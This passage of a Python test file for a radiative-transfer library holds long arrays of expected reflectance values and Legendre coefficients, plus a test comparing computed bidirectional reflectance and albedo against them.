-0.99393132e-03,
-0.13644308e-02,
-0.20072565e-02,
-0.31077981e-02,
-0.48824749e-02,
-0.74348073e-02,
-0.10457132e-01,
-0.12935034e-01,
-0.13322859e-01,
-0.10510216e-01,
-0.50372370e-02,
0.82519592e-03,
0.45412472e-02,
0.49564531e-02,
0.27259453e-02,
-0.53395459e-03,
-0.34414190e-02,
-0.54976437e-02,
-0.69722342e-02,
-0.84393835e-02,
-0.10464143e-01,
-0.13568074e-01,
-0.18088147e-01,
-0.23360549e-01,
-0.27191006e-01,
-0.27798105e-01,
-0.26014257e-01,
-0.23941122e-01,
0.67388569e-03,
0.76391455e-03,
0.87603967e-03,
0.99053816e-03,
0.10931880e-02,
0.11752385e-02,
0.12341201e-02,
0.12724005e-02,
0.12949465e-02,
0.13062552e-02,
0.13094257e-02,
0.13063867e-02,
0.12983767e-02,
0.12862559e-02,
0.12706857e-02,
0.12522101e-02,
0.12312382e-02,
0.12080271e-02,
0.11827156e-02,
0.11554065e-02,
0.11262480e-02,
0.10953922e-02,
0.10628636e-02,
0.10286153e-02,
0.99264085e-03,
0.95504802e-03,
0.91611175e-03,
0.87590015e-03,
0.83438883e-03,
0.79185999e-03,
0.74851344e-03,
0.70453959e-03,
0.66006870e-03,
0.61538786e-03,
0.57062833e-03,
0.52572385e-03,
0.48075779e-03,
0.43583699e-03,
0.39130700e-03,
0.34728937e-03,
0.30423937e-03,
0.26211512e-03,
0.22102211e-03,
0.18136523e-03,
0.14320243e-03,
0.10641267e-03,
0.70891205e-04,
0.36568774e-04,
0.29850753e-05,
-0.30428575e-04,
-0.63911211e-04,
-0.97726115e-04,
-0.13241505e-03,
-0.16834371e-03,
-0.20574214e-03,
-0.24483376e-03,
-0.28623073e-03,
-0.33093616e-03,
-0.38131754e-03,
-0.44136596e-03,
-0.51900127e-03,
-0.62973931e-03,
-0.80306787e-03,
-0.10939565e-02,
-0.15995824e-02,
-0.24733264e-02,
-0.39081872e-02,
-0.60330946e-02,
-0.86653326e-02,
-0.10997782e-01,
-0.11619342e-01,
-0.93000261e-02,
-0.42796796e-02,
0.12966705e-02,
0.47367909e-02,
0.48012077e-02,
0.23494719e-02,
-0.77558518e-03,
-0.32301398e-02,
-0.47397721e-02,
-0.57379329e-02,
-0.67931442e-02,
-0.83390176e-02,
-0.10730988e-01,
-0.14351542e-01,
-0.19255424e-01,
-0.24215246e-01,
-0.26824960e-01,
-0.25858946e-01,
-0.22609137e-01,
-0.19117815e-01,
0.54258847e-03,
0.61508559e-03,
0.70537691e-03,
0.79757918e-03,
0.88023918e-03,
0.94631047e-03,
0.99372561e-03,
0.10245563e-02,
0.10427287e-02,
0.10518713e-02,
0.10544811e-02,
0.10520979e-02,
0.10457006e-02,
0.10359808e-02,
0.10234818e-02,
0.10086508e-02,
0.99183375e-03,
0.97323948e-03,
0.95295400e-03,
0.93100907e-03,
0.90750493e-03,
0.88267523e-03,
0.85658359e-03,
0.82906929e-03,
0.80003683e-03,
0.76972524e-03,
0.73839410e-03,
0.70602290e-03,
0.67255105e-03,
0.63823280e-03,
0.60333178e-03,
0.56789321e-03,
0.53199811e-03,
0.49601536e-03,
0.45993822e-03,
0.42375299e-03,
0.38750842e-03,
0.35126708e-03,
0.31534981e-03,
0.27984436e-03,
0.24513889e-03,
0.21121174e-03,
0.17798673e-03,
0.14601613e-03,
0.11531570e-03,
0.85622109e-04,
0.56977922e-04,
0.29328881e-04,
0.23219493e-05,
-0.24609051e-04,
-0.51613693e-04,
-0.78829580e-04,
-0.10677023e-03,
-0.13576847e-03,
-0.16589028e-03,
-0.19740456e-03,
-0.23071076e-03,
-0.26662330e-03,
-0.30694614e-03,
-0.35483547e-03,
-0.41624482e-03,
-0.50326047e-03,
-0.63863368e-03,
-0.86484943e-03,
-0.12584554e-02,
-0.19429043e-02,
-0.30815345e-02,
-0.48037078e-02,
-0.70073316e-02,
-0.90698786e-02,
-0.97764749e-02,
-0.79293735e-02,
-0.35561759e-02,
0.14528841e-02,
0.44905520e-02,
0.43353909e-02,
0.19235054e-02,
-0.88058808e-03,
-0.28684181e-02,
-0.39436910e-02,
-0.46082577e-02,
-0.53751953e-02,
-0.65655066e-02,
-0.84049981e-02,
-0.11191580e-01,
-0.15233751e-01,
-0.20167785e-01,
-0.24146404e-01,
-0.24793619e-01,
-0.21611178e-01,
-0.16357245e-01,
-0.11137053e-01,
0.42571200e-03,
0.48259774e-03,
0.55344484e-03,
0.62578957e-03,
0.69064385e-03,
0.74247847e-03,
0.77967369e-03,
0.80386118e-03,
0.81812969e-03,
0.82533201e-03,
0.82742231e-03,
0.82559290e-03,
0.82059979e-03,
0.81299205e-03,
0.80320571e-03,
0.79159206e-03,
0.77843288e-03,
0.76390296e-03,
0.74805156e-03,
0.73085778e-03,
0.71239163e-03,
0.69290656e-03,
0.67251193e-03,
0.65096776e-03,
0.62812673e-03,
0.60432340e-03,
0.57976606e-03,
0.55436889e-03,
0.52808766e-03,
0.50110236e-03,
0.47373594e-03,
0.44590727e-03,
0.41769189e-03,
0.38944930e-03,
0.36113514e-03,
0.33273242e-03,
0.30424978e-03,
0.27580233e-03,
0.24755922e-03,
0.21969499e-03,
0.19240828e-03,
0.16580452e-03,
0.13966703e-03,
0.11454133e-03,
0.90488385e-04,
0.67134846e-04,
0.44648674e-04,
0.22957218e-04,
0.17676108e-05,
-0.19375148e-04,
-0.40583618e-04,
-0.61928760e-04,
-0.83859930e-04,
-0.10665116e-03,
-0.13027368e-03,
-0.15504849e-03,
-0.18114736e-03,
-0.20928915e-03,
-0.24077985e-03,
-0.27812496e-03,
-0.32568991e-03,
-0.39278640e-03,
-0.49672712e-03,
-0.66978729e-03,
-0.97107701e-03,
-0.14971532e-02,
-0.23801890e-02,
-0.37356641e-02,
-0.55097779e-02,
-0.72345133e-02,
-0.79152975e-02,
-0.64894208e-02,
-0.28653429e-02,
0.13867198e-02,
0.39382749e-02,
0.36805528e-02,
0.15104047e-02,
-0.85980649e-03,
-0.24118538e-02,
-0.31621221e-02,
-0.36013129e-02,
-0.41603735e-02,
-0.50707515e-02,
-0.64725522e-02,
-0.85721835e-02,
-0.11695998e-01,
-0.15934667e-01,
-0.20252047e-01,
-0.22257976e-01,
-0.20039089e-01,
-0.14158701e-01,
-0.70773158e-02,
-0.11583769e-02,
0.32308648e-03,
0.36626059e-03,
0.42002957e-03,
0.47493313e-03,
0.52414869e-03,
0.56347938e-03,
0.59169793e-03,
0.61004912e-03,
0.62088534e-03,
0.62637340e-03,
0.62798650e-03,
0.62661694e-03,
0.62283722e-03,
0.61707193e-03,
0.60965854e-03,
0.60086075e-03,
0.59088779e-03,
0.57988992e-03,
0.56789967e-03,
0.55486214e-03,
0.54083182e-03,
0.52603544e-03,
0.51060918e-03,
0.49428100e-03,
0.47690922e-03,
0.45883877e-03,
0.44021819e-03,
0.42093766e-03,
0.40098530e-03,
0.38046407e-03,
0.35971330e-03,
0.33858226e-03,
0.31714686e-03,
0.29569783e-03,
0.27421847e-03,
0.25265093e-03,
0.23099354e-03,
0.20943003e-03,
0.18794239e-03,
0.16680970e-03,
0.14604363e-03,
0.12587215e-03,
0.10602640e-03,
0.86910019e-04,
0.68677633e-04,
0.50912015e-04,
0.33862842e-04,
0.17410162e-04,
0.13113118e-05,
-0.14745443e-04,
-0.30839601e-04,
-0.47037924e-04,
-0.63687643e-04,
-0.81004437e-04,
-0.98914243e-04,
-0.11776508e-03,
-0.13753906e-03,
-0.15888251e-03,
-0.18270283e-03,
-0.21094215e-03,
-0.24672056e-03,
-0.29703090e-03,
-0.37476781e-03,
-0.50383923e-03,
-0.72860206e-03,
-0.11220841e-02,
-0.17865424e-02,
-0.28166992e-02,
-0.41856705e-02,
-0.55507738e-02,
-0.61370027e-02,
-0.50718379e-02,
-0.22190376e-02,
0.11870584e-02,
0.32180531e-02,
0.29439172e-02,
0.11399792e-02,
-0.75004215e-03,
-0.19179990e-02,
-0.24332437e-02,
-0.27225760e-02,
-0.31262944e-02,
-0.38075345e-02,
-0.48529524e-02,
-0.64000175e-02,
-0.87149860e-02,
-0.12041125e-01,
-0.15928924e-01,
-0.18521670e-01,
-0.17406538e-01,
-0.11980806e-01,
-0.43471926e-02,
0.24430454e-02,
0.64657470e-02,
0.23461202e-03,
0.26596323e-03,
0.30500707e-03,
0.34487346e-03,
0.38060735e-03,
0.40916057e-03,
0.42964329e-03,
0.44296391e-03,
0.45083603e-03,
0.45483361e-03,
0.45601939e-03,
0.45503493e-03,
0.45229631e-03,
0.44811305e-03,
0.44273314e-03,
0.43635038e-03,
0.42911444e-03,
0.42114657e-03,
0.41246001e-03,
0.40299704e-03,
0.39280354e-03,
0.38204770e-03,
0.37087622e-03,
0.35903638e-03,
0.34639766e-03,
0.33326566e-03,
0.31975409e-03,
0.30575541e-03,
0.29127134e-03,
0.27634719e-03,
0.26128866e-03,
0.24593511e-03,
0.23035664e-03,
0.21476793e-03,
0.19919084e-03,
0.18352638e-03,
0.16776577e-03,
0.15213400e-03,
0.13650597e-03,
0.12117127e-03,
0.10604783e-03,
0.91420814e-04,
0.77014876e-04,
0.63102707e-04,
0.49865157e-04,
0.36943147e-04,
0.24579298e-04,
0.12646942e-04,
0.93583714e-06,
-0.10726711e-04,
-0.22409520e-04,
-0.34169330e-04,
-0.46268411e-04,
-0.58847447e-04,
-0.71843184e-04,
-0.85561762e-04,
-0.99899378e-04,
-0.11538975e-03,
-0.13264996e-03,
-0.15311912e-03,
-0.17894371e-03,
-0.21519083e-03,
-0.27111307e-03,
-0.36378118e-03,
-0.52517361e-03,
-0.80816675e-03,
-0.12878858e-02,
-0.20363682e-02,
-0.30407030e-02,
-0.40585143e-02,
-0.45180605e-02,
-0.37541774e-02,
-0.16340034e-02,
0.92716783e-03,
0.24486976e-02,
0.22101640e-02,
0.82245702e-03,
-0.59355749e-03,
-0.14349412e-02,
-0.17818650e-02,
-0.19710022e-02,
-0.22550686e-02,
-0.27460111e-02,
-0.34975049e-02,
-0.45994679e-02,
-0.62465151e-02,
-0.86843111e-02,
-0.11772950e-01,
-0.14247025e-01,
-0.13897673e-01,
-0.95402114e-02,
-0.26456779e-02,
0.37637560e-02,
0.75113312e-02,
0.82785152e-02,
0.16024915e-03,
0.18166313e-03,
0.20833101e-03,
0.23556003e-03,
0.25996531e-03,
0.27946456e-03,
0.29345075e-03,
0.30254686e-03,
0.30792650e-03,
0.31066421e-03,
0.31148014e-03,
0.31080900e-03,
0.30893844e-03,
0.30608277e-03,
0.30241298e-03,
0.29805984e-03,
0.29311786e-03,
0.28767882e-03,
0.28175494e-03,
0.27529473e-03,
0.26832905e-03,
0.26097632e-03,
0.25335979e-03,
0.24527783e-03,
0.23663967e-03,
0.22766842e-03,
0.21843993e-03,
0.20887410e-03,
0.19898124e-03,
0.18877641e-03,
0.17849728e-03,
0.16801062e-03,
0.15736978e-03,
0.14671541e-03,
0.13608270e-03,
0.12537625e-03,
0.11459773e-03,
0.10394175e-03,
0.93250273e-04,
0.82784871e-04,
0.72433824e-04,
0.62449340e-04,
0.52622323e-04,
0.43097367e-04,
0.34058194e-04,
0.25217514e-04,
0.16786646e-04,
0.86424679e-05,
0.63486573e-06,
-0.73354054e-05,
-0.15307762e-04,
-0.23343211e-04,
-0.31608852e-04,
-0.40205730e-04,
-0.49073769e-04,
-0.58462469e-04,
-0.68241599e-04,
-0.78819096e-04,
-0.90594622e-04,
-0.10456181e-03,
-0.12214016e-03,
-0.14677636e-03,
-0.18476187e-03,
-0.24763195e-03,
-0.35712289e-03,
-0.54928858e-03,
-0.87579578e-03,
-0.13871513e-02,
-0.20772433e-02,
-0.27833104e-02,
-0.31113259e-02,
-0.25939168e-02,
-0.11258019e-02,
0.66039932e-03,
0.17193498e-02,
0.15396239e-02,
0.55894168e-03,
-0.42620959e-03,
-0.99759083e-03,
-0.12229718e-02,
-0.13435301e-02,
-0.15339972e-02,
-0.18679998e-02,
-0.23784370e-02,
-0.31225604e-02,
-0.42320755e-02,
-0.58987723e-02,
-0.81079528e-02,
-0.10059725e-01,
-0.10070107e-01,
-0.69461395e-02,
-0.15970924e-02,
0.35173711e-02,
0.64823525e-02,
0.69939806e-02,
0.58447313e-02,
0.99998928e-04,
0.11336149e-03,
0.13000234e-03,
0.14699313e-03,
0.16222145e-03,
0.17438777e-03,
0.18311353e-03,
0.18878833e-03,
0.19214548e-03,
0.19385564e-03,
0.19436714e-03,
0.19395056e-03,
0.19278521e-03,
0.19100346e-03,
0.18871219e-03,
0.18599514e-03,
0.18291226e-03,
0.17952279e-03,
0.17582905e-03,
0.17179834e-03,
0.16745202e-03,
0.16285951e-03,
0.15811202e-03,
0.15307403e-03,
0.14767774e-03,
0.14207418e-03,
0.13631718e-03,
0.13035099e-03,
0.12418116e-03,
0.11780974e-03,
0.11139606e-03,
0.10484913e-03,
0.98205564e-04,
0.91553651e-04,
0.84926301e-04,
0.78246710e-04,
0.71511990e-04,
0.64868305e-04,
0.58195605e-04,
0.51666491e-04,
0.45197361e-04,
0.38973347e-04,
0.32842243e-04,
0.26893933e-04,
0.21249898e-04,
0.15730866e-04,
0.10472757e-04,
0.53960257e-05,
0.39317513e-06,
-0.45791730e-05,
-0.95536843e-05,
-0.14566379e-04,
-0.19728041e-04,
-0.25091455e-04,
-0.30624815e-04,
-0.36488018e-04,
-0.42586758e-04,
-0.49185081e-04,
-0.56528501e-04,
-0.65242508e-04,
-0.76187855e-04,
-0.91523340e-04,
-0.11515653e-03,
-0.15424404e-03,
-0.22232164e-03,
-0.34186023e-03,
-0.54521387e-03,
-0.86433312e-03,
-0.12963127e-02,
-0.17405468e-02,
-0.19500151e-02,
-0.16286803e-02,
-0.70585759e-03,
0.42125979e-03,
0.10887617e-02,
0.97085984e-03,
0.34771912e-03,
-0.27306599e-03,
-0.62840234e-03,
-0.76508470e-03,
-0.83742116e-03,
-0.95511600e-03,
-0.11631359e-02,
-0.14807530e-02,
-0.19422875e-02,
-0.26292126e-02,
-0.36683388e-02,
-0.50780545e-02,
-0.63869823e-02,
-0.64897770e-02,
-0.44976156e-02,
-0.92731958e-03,
0.25404119e-02,
0.45405924e-02,
0.48503033e-02,
0.40294230e-02,
0.27683314e-02,
0.53884014e-04,
0.61084211e-04,
0.70050810e-04,
0.79205915e-04,
0.87411223e-04,
0.93966446e-04,
0.98667610e-04,
0.10172475e-03,
0.10353317e-03,
0.10445446e-03,
0.10473084e-03,
0.10450836e-03,
0.10388237e-03,
0.10292211e-03,
0.10168495e-03,
0.10021854e-03,
0.98558390e-04,
0.96735770e-04,
0.94745832e-04,
0.92573500e-04,
0.90232592e-04,
0.87755776e-04,
0.85199157e-04,
0.82488186e-04,
0.79575933e-04,
0.76551951e-04,
0.73451745e-04,
0.70241033e-04,
0.66919587e-04,
0.63485968e-04,
0.60029004e-04,
0.56497996e-04,
0.52914555e-04,
0.49328813e-04,
0.45763074e-04,
0.42167223e-04,
0.38533406e-04,
0.34952976e-04,
0.31360858e-04,
0.27841659e-04,
0.24351986e-04,
0.21002805e-04,
0.17696189e-04,
0.14492869e-04,
0.11447947e-04,
0.84757721e-05,
0.56412364e-05,
0.29090747e-05,
0.20986288e-06,
-0.24671158e-05,
-0.51494958e-05,
-0.78480261e-05,
-0.10632524e-04,
-0.13520086e-04,
-0.16503614e-04,
-0.19662311e-04,
-0.22948981e-04,
-0.26503118e-04,
-0.30458663e-04,
-0.35155379e-04,
-0.41044819e-04,
-0.49301310e-04,
-0.62018436e-04,
-0.83043000e-04,
-0.11966786e-03,
-0.18399033e-03,
-0.29346853e-03,
-0.46542627e-03,
-0.69852220e-03,
-0.93878357e-03,
-0.10528294e-02,
-0.88006578e-03,
-0.38117066e-03,
0.22924476e-03,
0.59057289e-03,
0.52561943e-03,
0.18708916e-03,
-0.14889365e-03,
-0.34005527e-03,
-0.41272707e-03,
-0.45099761e-03,
-0.51413663e-03,
-0.62613422e-03,
-0.79706579e-03,
-0.10450790e-02,
-0.14138672e-02,
-0.19733894e-02,
-0.27403242e-02,
-0.34682453e-02,
-0.35488785e-02,
-0.24659703e-02,
-0.48296375e-03,
0.14571503e-02,
0.25734871e-02,
0.27371510e-02,
0.22676513e-02,
0.15553402e-02,
0.87312493e-03,
0.21932714e-04,
0.24863417e-04,
0.28513090e-04,
0.32239484e-04,
0.35579265e-04,
0.38247381e-04,
0.40160809e-04,
0.41405037e-04,
0.42140975e-04,
0.42515869e-04,
0.42628493e-04,
0.42538381e-04,
0.42284017e-04,
0.41893109e-04,
0.41388936e-04,
0.40791474e-04,
0.40115974e-04,
0.39374940e-04,
0.38564984e-04,
0.37680649e-04,
0.36728081e-04,
0.35719502e-04,
0.34679109e-04,
0.33576438e-04,
0.32390075e-04,
0.31158215e-04,
0.29896764e-04,
0.28590852e-04,
0.27239597e-04,
0.25841982e-04,
0.24434608e-04,
0.22996630e-04,
0.21537227e-04,
0.20077452e-04,
0.18627210e-04,
0.17164399e-04,
0.15684327e-04,
0.14226660e-04,
0.12765439e-04,
0.11332698e-04,
0.99115950e-05,
0.85493384e-05,
0.72026537e-05,
0.58994046e-05,
0.46591872e-05,
0.34499117e-05,
0.22957561e-05,
0.11843766e-05,
0.84998014e-07,
-0.10040685e-05,
-0.20963864e-05,
-0.31941836e-05,
-0.43282666e-05,
-0.55030100e-05,
-0.67179099e-05,
-0.80033133e-05,
-0.93413128e-05,
-0.10787697e-04,
-0.12397514e-04,
-0.14309594e-04,
-0.16705344e-04,
-0.20065328e-04,
-0.25239178e-04,
-0.33791446e-04,
-0.48691152e-04,
-0.74860320e-04,
-0.11940804e-03,
-0.18940083e-03,
-0.28432420e-03,
-0.38224252e-03,
-0.42882701e-03,
-0.35856038e-03,
-0.15526464e-03,
0.93624702e-04,
0.24092782e-03,
0.21429047e-03,
0.76112388e-04,
-0.60849816e-04,
-0.13861567e-03,
-0.16805886e-03,
-0.18353794e-03,
-0.20919893e-03,
-0.25477342e-03,
-0.32431912e-03,
-0.42517454e-03,
-0.57509379e-03,
-0.80277218e-03,
-0.11159416e-02,
-0.14153966e-02,
-0.14518298e-02,
-0.10097986e-02,
-0.19427406e-03,
0.60561736e-03,
0.10654813e-02,
0.11315914e-02,
0.93659549e-03,
0.64201583e-03,
0.36030522e-03,
0.14866883e-03,
0.41634707e-05,
0.47198023e-05,
0.54126149e-05,
0.61199912e-05,
0.67539763e-05,
0.72604594e-05,
0.76236788e-05,
0.78598650e-05,
0.79995607e-05,
0.80707214e-05,
0.80921054e-05,
0.80750178e-05,
0.80267509e-05,
0.79525425e-05,
0.78568110e-05,
0.77433706e-05,
0.76151509e-05,
0.74745158e-05,
0.73207625e-05,
0.71528843e-05,
0.69720704e-05,
0.67805959e-05,
0.65831077e-05,
0.63738212e-05,
0.61485744e-05,
0.59146905e-05,
0.56752488e-05,
0.54273883e-05,
0.51709094e-05,
0.49056021e-05,
0.46384298e-05,
0.43654286e-05,
0.40883574e-05,
0.38112394e-05,
0.35359881e-05,
0.32583384e-05,
0.29773378e-05,
0.27006156e-05,
0.24232718e-05,
0.21512824e-05,
0.18814886e-05,
0.16229329e-05,
0.13672592e-05,
0.11198919e-05,
0.88442783e-06,
0.65489411e-06,
0.43578387e-06,
0.22484058e-06,
0.16117639e-07,
-0.19059540e-06,
-0.39797052e-06,
-0.60633920e-06,
-0.82165008e-06,
-0.10446255e-05,
-0.12752704e-05,
-0.15192638e-05,
-0.17732648e-05,
-0.20478196e-05,
-0.23534012e-05,
-0.27163851e-05,
-0.31711115e-05,
-0.38089131e-05,
-0.47909707e-05,
-0.64142382e-05,
-0.92423534e-05,
-0.14209581e-04,
-0.22665536e-04,
-0.35952206e-04,
-0.53973064e-04,
-0.72565315e-04,
-0.81414371e-04,
-0.68077694e-04,
-0.29477938e-04,
0.17784128e-04,
0.45754921e-04,
0.40691128e-04,
0.14446910e-04,
-0.11559983e-04,
-0.26320620e-04,
-0.31904819e-04,
-0.34839621e-04,
-0.39709423e-04,
-0.48360336e-04,
-0.61561077e-04,
-0.80702943e-04,
-0.10915505e-03,
-0.15237252e-03,
-0.21185735e-03,
-0.26881794e-03,
-0.27586648e-03,
-0.19191137e-03,
-0.36795147e-04,
0.11542100e-03,
0.20291690e-03,
0.21544744e-03,
0.17828873e-03,
0.12219916e-03,
0.68575428e-04,
0.28294970e-04,
0.53851386e-05,
]
)
return spherical_albedo, albedo, expected_r1
| 27.33128 | 77 | 0.43567 |
import numpy as np
from mishchenko_brf.lib.refl import brf
def test_brf():
ssalb, _, legendre = setup()
_, spherical_albedo, albedo, _, r = brf(ssalb, len(legendre), legendre)
exptected_spherical_albedo, expected_albedo, expected_r1 = results()
np.testing.assert_allclose(albedo, expected_albedo, atol=1e-6, rtol=0)
r1 = np.concatenate([r[1, i, : i + 1] for i in range(r.shape[1])])
np.testing.assert_allclose(r1, expected_r1, atol=1e-5, rtol=0)
def setup():
ssalb = 0.85404045e00
Legendre_coef = [
0.1000000e01,
0.2512562e01,
0.3759305e01,
0.4408389e01,
0.5536463e01,
0.6260982e01,
0.7525636e01,
0.8312788e01,
0.9542491e01,
0.1040885e02,
0.1151645e02,
0.1244280e02,
0.1343854e02,
0.1442002e02,
0.1533074e02,
0.1628946e02,
0.1717182e02,
0.1807816e02,
0.1898665e02,
0.1978204e02,
0.2073036e02,
0.2142049e02,
0.2241713e02,
0.2301598e02,
0.2401247e02,
0.2456069e02,
0.2552589e02,
0.2607232e02,
0.2695832e02,
0.2752722e02,
0.2831653e02,
0.2892665e02,
0.2962000e02,
0.3025463e02,
0.3086891e02,
0.3150598e02,
0.3207453e02,
0.3268248e02,
0.3323146e02,
0.3378450e02,
0.3433640e02,
0.3482245e02,
0.3538333e02,
0.3580127e02,
0.3636525e02,
0.3672771e02,
0.3728034e02,
0.3760455e02,
0.3812729e02,
0.3843143e02,
0.3890899e02,
0.3920687e02,
0.3962926e02,
0.3992750e02,
0.4029233e02,
0.4059085e02,
0.4090206e02,
0.4119521e02,
0.4146075e02,
0.4174035e02,
0.4196960e02,
0.4222747e02,
0.4242858e02,
0.4265858e02,
0.4283710e02,
0.4303618e02,
0.4319451e02,
0.4336267e02,
0.4350045e02,
0.4364008e02,
0.4375514e02,
0.4386992e02,
0.4395939e02,
0.4405318e02,
0.4411450e02,
0.4419058e02,
0.4422209e02,
0.4428264e02,
0.4428387e02,
0.4432995e02,
0.4430155e02,
0.4433324e02,
0.4427669e02,
0.4429349e02,
0.4421068e02,
0.4421187e02,
0.4410481e02,
0.4408970e02,
0.4396023e02,
0.4392847e02,
0.4377812e02,
0.4372965e02,
0.4355963e02,
0.4349478e02,
0.4330600e02,
0.4322534e02,
0.4301853e02,
0.4292279e02,
0.4269857e02,
0.4258853e02,
0.4234756e02,
0.4222396e02,
0.4196694e02,
0.4183048e02,
0.4155822e02,
0.4140946e02,
0.4112286e02,
0.4096230e02,
0.4066235e02,
0.4049042e02,
0.4017813e02,
0.3999523e02,
0.3967166e02,
0.3947818e02,
0.3914435e02,
0.3894071e02,
0.3859761e02,
0.3838426e02,
0.3803282e02,
0.3781024e02,
0.3745135e02,
0.3722008e02,
0.3685457e02,
0.3661513e02,
0.3624382e02,
0.3599677e02,
0.3562045e02,
0.3536629e02,
0.3498576e02,
0.3472502e02,
0.3434105e02,
0.3407421e02,
0.3368756e02,
0.3341511e02,
0.3302651e02,
0.3274894e02,
0.3235911e02,
0.3207689e02,
0.3168649e02,
0.3140011e02,
0.3100977e02,
0.3071973e02,
0.3033004e02,
0.3003681e02,
0.2964833e02,
0.2935240e02,
0.2896567e02,
0.2866749e02,
0.2828303e02,
0.2798304e02,
0.2760134e02,
0.2729996e02,
0.2692148e02,
0.2661913e02,
0.2624432e02,
0.2594138e02,
0.2557065e02,
0.2526752e02,
0.2490123e02,
0.2459831e02,
0.2423680e02,
0.2393445e02,
0.2357803e02,
0.2327663e02,
0.2292556e02,
0.2262546e02,
0.2228000e02,
0.2198153e02,
0.2164193e02,
0.2134540e02,
0.2101185e02,
0.2071756e02,
0.2039027e02,
0.2009849e02,
0.1977763e02,
0.1948862e02,
0.1917433e02,
0.1888834e02,
0.1858075e02,
0.1829802e02,
0.1799722e02,
0.1771798e02,
0.1742405e02,
0.1714851e02,
0.1686151e02,
0.1658986e02,
0.1630983e02,
0.1604226e02,
0.1576923e02,
0.1550590e02,
0.1523988e02,
0.1498093e02,
0.1472193e02,
0.1446749e02,
0.1421550e02,
0.1396569e02,
0.1372068e02,
0.1347561e02,
0.1323754e02,
0.1299730e02,
0.1276613e02,
0.1253080e02,
0.1230645e02,
0.1207611e02,
0.1185852e02,
0.1163322e02,
0.1142231e02,
0.1120210e02,
0.1099778e02,
0.1078270e02,
0.1058487e02,
0.1037494e02,
0.1018351e02,
0.9978738e01,
0.9793600e01,
0.9593997e01,
0.9415044e01,
0.9220600e01,
0.9047715e01,
0.8858418e01,
0.8691482e01,
0.8507312e01,
0.8346198e01,
0.8167129e01,
0.8011710e01,
0.7837708e01,
0.7687854e01,
0.7518876e01,
0.7374456e01,
0.7210453e01,
0.7071336e01,
0.6912254e01,
0.6778307e01,
0.6624084e01,
0.6495174e01,
0.6345745e01,
0.6221738e01,
0.6077033e01,
0.5957794e01,
0.5817740e01,
0.5703134e01,
0.5567654e01,
0.5457548e01,
0.5326563e01,
0.5220821e01,
0.5094248e01,
0.4992739e01,
0.4870492e01,
0.4773085e01,
0.4655075e01,
0.4561642e01,
0.4447778e01,
0.4358190e01,
0.4248381e01,
0.4162514e01,
0.4056666e01,
0.3974395e01,
0.3872413e01,
0.3793618e01,
0.3695406e01,
0.3619966e01,
0.3525429e01,
0.3453228e01,
0.3362271e01,
0.3293193e01,
0.3205718e01,
0.3139651e01,
0.3055564e01,
0.2992397e01,
0.2911601e01,
0.2851228e01,
0.2773628e01,
0.2715944e01,
0.2641446e01,
0.2586348e01,
0.2514857e01,
0.2462248e01,
0.2393671e01,
0.2343453e01,
0.2277698e01,
0.2229778e01,
0.2166754e01,
0.2121041e01,
0.2060659e01,
0.2017065e01,
0.1959237e01,
0.1917674e01,
0.1862314e01,
0.1822700e01,
0.1769722e01,
0.1731977e01,
0.1681298e01,
0.1645344e01,
0.1596882e01,
0.1562643e01,
0.1516319e01,
0.1483723e01,
0.1439458e01,
0.1408435e01,
0.1366152e01,
0.1336633e01,
0.1296260e01,
0.1268180e01,
0.1229642e01,
0.1202937e01,
0.1166165e01,
0.1140775e01,
0.1105699e01,
0.1081566e01,
0.1048119e01,
0.1025186e01,
0.9933033e00,
0.9715168e00,
0.9411347e00,
0.9204422e00,
0.8914999e00,
0.8718511e00,
0.8442892e00,
0.8256361e00,
0.7993970e00,
0.7816934e00,
0.7567216e00,
0.7399231e00,
0.7161648e00,
0.7002287e00,
0.6776319e00,
0.6625175e00,
0.6410319e00,
0.6267001e00,
0.6062772e00,
0.5926905e00,
0.5732835e00,
0.5604061e00,
0.5419698e00,
0.5297674e00,
0.5122584e00,
0.5006981e00,
0.4840745e00,
0.4731249e00,
0.4573463e00,
0.4469774e00,
0.4320051e00,
0.4221882e00,
0.4079849e00,
0.3986924e00,
0.3852225e00,
0.3764283e00,
0.3636572e00,
0.3553362e00,
0.3432310e00,
0.3353594e00,
0.3238883e00,
0.3164434e00,
0.3055761e00,
0.2985361e00,
0.2882435e00,
0.2815877e00,
0.2718419e00,
0.2655505e00,
0.2563248e00,
0.2503791e00,
0.2416479e00,
0.2360299e00,
0.2277687e00,
0.2224615e00,
0.2146470e00,
0.2096341e00,
0.2022440e00,
0.1975101e00,
0.1905229e00,
0.1860533e00,
0.1794487e00,
0.1752294e00,
0.1689879e00,
0.1650056e00,
0.1591086e00,
0.1553506e00,
0.1497804e00,
0.1462348e00,
0.1409744e00,
0.1376297e00,
0.1326632e00,
0.1295086e00,
0.1248204e00,
0.1218456e00,
0.1174212e00,
0.1146165e00,
0.1104419e00,
0.1077980e00,
0.1038600e00,
0.1013680e00,
0.9765404e-01,
0.9530568e-01,
0.9180371e-01,
0.8959107e-01,
0.8628968e-01,
0.8420526e-01,
0.8109362e-01,
0.7913032e-01,
0.7619812e-01,
0.7434919e-01,
0.7158666e-01,
0.6984571e-01,
0.6724356e-01,
0.6560456e-01,
0.6315396e-01,
0.6161117e-01,
0.5930377e-01,
0.5785177e-01,
0.5567961e-01,
0.5431328e-01,
0.5226885e-01,
0.5098332e-01,
0.4905947e-01,
0.4785016e-01,
0.4604013e-01,
0.4490269e-01,
0.4320006e-01,
0.4213037e-01,
0.4052908e-01,
0.3952327e-01,
0.3801755e-01,
0.3707194e-01,
0.3565637e-01,
0.3476748e-01,
0.3343689e-01,
0.3260145e-01,
0.3135097e-01,
0.3056588e-01,
0.2939089e-01,
0.2865322e-01,
0.2754936e-01,
0.2685635e-01,
0.2581950e-01,
0.2516853e-01,
0.2419479e-01,
0.2358340e-01,
0.2266910e-01,
0.2209496e-01,
0.2123660e-01,
0.2069752e-01,
0.1989183e-01,
0.1938574e-01,
0.1862960e-01,
0.1815454e-01,
0.1744504e-01,
0.1699918e-01,
0.1633353e-01,
0.1591513e-01,
0.1529073e-01,
0.1489815e-01,
0.1431255e-01,
0.1394424e-01,
0.1339511e-01,
0.1304962e-01,
0.1253477e-01,
0.1221073e-01,
0.1172810e-01,
0.1142421e-01,
0.1097185e-01,
0.1068691e-01,
0.1026299e-01,
0.9995839e-02,
0.9598632e-02,
0.9348197e-02,
0.8976075e-02,
0.8741341e-02,
0.8392774e-02,
0.8172784e-02,
0.7846332e-02,
0.7640186e-02,
0.7334491e-02,
0.7141344e-02,
0.6855129e-02,
0.6674184e-02,
0.6406246e-02,
0.6236754e-02,
0.5985964e-02,
0.5827218e-02,
0.5592512e-02,
0.5443850e-02,
0.5224227e-02,
0.5085025e-02,
0.4879544e-02,
0.4749216e-02,
